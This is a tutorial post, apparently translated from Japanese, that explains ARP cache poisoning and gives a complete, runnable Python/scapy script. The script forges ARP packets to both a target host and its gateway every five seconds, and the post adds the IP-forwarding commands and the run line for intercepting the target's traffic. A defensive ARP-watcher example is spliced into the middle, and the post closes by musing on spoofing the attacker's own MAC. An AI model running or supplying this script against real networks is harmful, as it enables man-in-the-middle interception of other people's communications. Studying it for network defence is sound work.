ARP spoofing with python

ARP spoofing

First of all, I will explain what ARP is in my own way. (I think it is easier to understand if you draw a figure.) In communication within the local network (Layer 2 and below), the MAC address is looked up from the IP address, and communication is carried out based on that MAC address. The ARP protocol is in charge of this part: "finding the MAC address from the IP address".

Now that you have a rough idea of how ARP works, on to ARP spoofing. Looking up the MAC address from the IP address every time you communicate would be heavy and inconvenient, so each terminal actually keeps data that says "this IP address has this MAC address" (hereinafter referred to as the ARP table). ARP spoofing is the attempt to change (falsify) that data. If you do this, packets that would otherwise be sent to the router are sent to the attacker's terminal, and by also changing the router's ARP table the attacker can insert itself into the communication.

The following program does two things:

  1. Send an ARP request packet disguised as the gateway or the target. (This alone can corrupt the ARP table.)
  2. Send the correct ARP packet before the program terminates, so that communication returns to normal.

The key point is step 1. Many ARP spoofing tools send a reply every second instead of an ARP request, and slip in at the moment the target's ARP table is updated. With that approach you have to wait until the ARP table is due to be updated. My implementation uses the lesser-known behavior that "the ARP table is rewritten by an ARP request".

#coding:utf-8
from scapy.all import *
import time
import sys

conf.verb = 0  # silence scapy's per-packet output
# Addresses are taken from the command line (see "To run")
gateway_ip = sys.argv[1]
gateway_mac = sys.argv[2]
target_ip = sys.argv[3]
target_mac = sys.argv[4]

def main():
	try:
		print("[*] Start ARPspoofing...")
		poison_target(target_ip,target_mac,gateway_ip,gateway_mac)
	except KeyboardInterrupt:
		pass
	finally:
		# Always send the correct entry back before exiting
		time.sleep(2)
		restore_table(gateway_ip,gateway_mac,target_ip,target_mac)
		sys.exit(0)

def poison_target(target_ip,target_mac,gateway_ip,gateway_mac):
	# Frame for the target: the sender IP is set to the gateway's IP
	poisoning_target = Ether(dst=target_mac)/ARP()
	poisoning_target.op = 2
	poisoning_target.psrc = gateway_ip
	poisoning_target.pdst = target_ip

	# Frame for the gateway: the sender IP is set to the target's IP
	poisoning_gateway = Ether(dst=gateway_mac)/ARP()
	poisoning_gateway.op = 2
	poisoning_gateway.psrc = target_ip
	poisoning_gateway.pdst = gateway_ip

	# Resend every 5 seconds until interrupted with Ctrl+C
	while True:
		sendp(poisoning_target)
		sendp(poisoning_gateway)
		time.sleep(5)
	print("[*] Finished.")
	return

def restore_table(gateway_ip,gateway_mac,target_ip,target_mac):
	print("[*] Restoring target.")
	# Send the gateway's real IP/MAC pair to the target three times
	send(ARP(op=1,psrc=gateway_ip,hwsrc=gateway_mac,pdst=target_ip,hwdst=target_mac),count=3)

if __name__=="__main__":
	main()

For mac

sudo sysctl -w net.inet.ip.forwarding=1

For Linux

sudo sysctl -w net.ipv4.ip_forward=1

To run

sudo python arpspoofing.py <gateway IP> <gateway MAC> <target IP> <target MAC>

All packets sent by the terminal specified as the target will now flow to your terminal.
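Seen from the defender's side, the ARP table rewrite described above shows up on the wire as an ARP frame whose sender fields contradict a binding already seen, whether that frame is a request or a reply. The following is an added example, not part of the original post: a standard-library parser and watcher run over constructed frames (the names `parse_arp`, `ArpWatch` and `build_frame`, and the 192.0.2.x / 02:00:... addresses, are assumptions made for the sample).

```python
import socket
import struct

def parse_arp(frame):
    """Return sender fields of an Ethernet/IPv4 ARP frame, or None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4) or op not in (1, 2):
        return None
    return {"op": "request" if op == 1 else "reply", "eth_src": frame[6:12].hex(":"),
            "sha": frame[22:28].hex(":"), "spa": socket.inet_ntoa(frame[28:32])}

class ArpWatch:
    """Remembers sender IP -> MAC bindings and reports frames that contradict them."""
    def __init__(self, pinned=None):
        self.table = dict(pinned or {})
    def observe(self, frame):
        p, alerts = parse_arp(frame), []
        if p is None:
            return alerts
        # Requests carry a sender binding too, so they are checked like replies.
        known = self.table.setdefault(p["spa"], p["sha"])
        if known != p["sha"]:
            alerts.append(("binding-changed", p["op"], p["spa"], known, p["sha"]))
        # A sender MAC that differs from the Ethernet source is a separate anomaly.
        if p["eth_src"] != p["sha"]:
            alerts.append(("sender-mismatch", p["op"], p["spa"], p["eth_src"], p["sha"]))
        return alerts

def build_frame(op, eth_src, sha, spa, tha, tpa, eth_dst="ff:ff:ff:ff:ff:ff"):
    """Bytes of a constructed ARP frame (sample input only; nothing is sent)."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    return (m(eth_dst) + m(eth_src) + b"\x08\x06"
            + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + m(sha) + socket.inet_aton(spa) + m(tha) + socket.inet_aton(tpa))

# Constructed sample: gateway 192.0.2.1, host 192.0.2.10, and a third MAC.
GW, HOST, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:10", "02:00:00:00:00:99"
SAMPLE = [
    build_frame(1, HOST, HOST, "192.0.2.10", "00:00:00:00:00:00", "192.0.2.1"),
    build_frame(2, GW, GW, "192.0.2.1", HOST, "192.0.2.10", eth_dst=HOST),
    # Request whose sender fields claim the gateway's IP with a different MAC
    build_frame(1, OTHER, OTHER, "192.0.2.1", HOST, "192.0.2.10", eth_dst=HOST),
]

def run_sample():
    watch = ArpWatch()
    return [alert for f in SAMPLE for alert in watch.observe(f)]
```

The watcher keeps the first binding it learned, so a conflicting frame keeps alerting on every repeat; passing `pinned` with the real gateway entry avoids trusting whatever was seen first.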

Problem

Previously, I obtained the MAC addresses of the other parties (gateway, target) by broadcasting, but the request packet sent at that point contains the MAC address of my own terminal (the attacker). Because that address ends up in their ARP tables, the MAC address may be duplicated once ARP spoofing is performed, so I decided to specify the MAC addresses instead. However, since the attacker's MAC address already exists in the gateway before ARP spoofing is performed, there will still be duplication... So, as a solution, I am currently thinking of spoofing the attacker's MAC address. A virtual machine might also be an option.

Referenced book https://www.oreilly.co.jp/books/9784873117317/
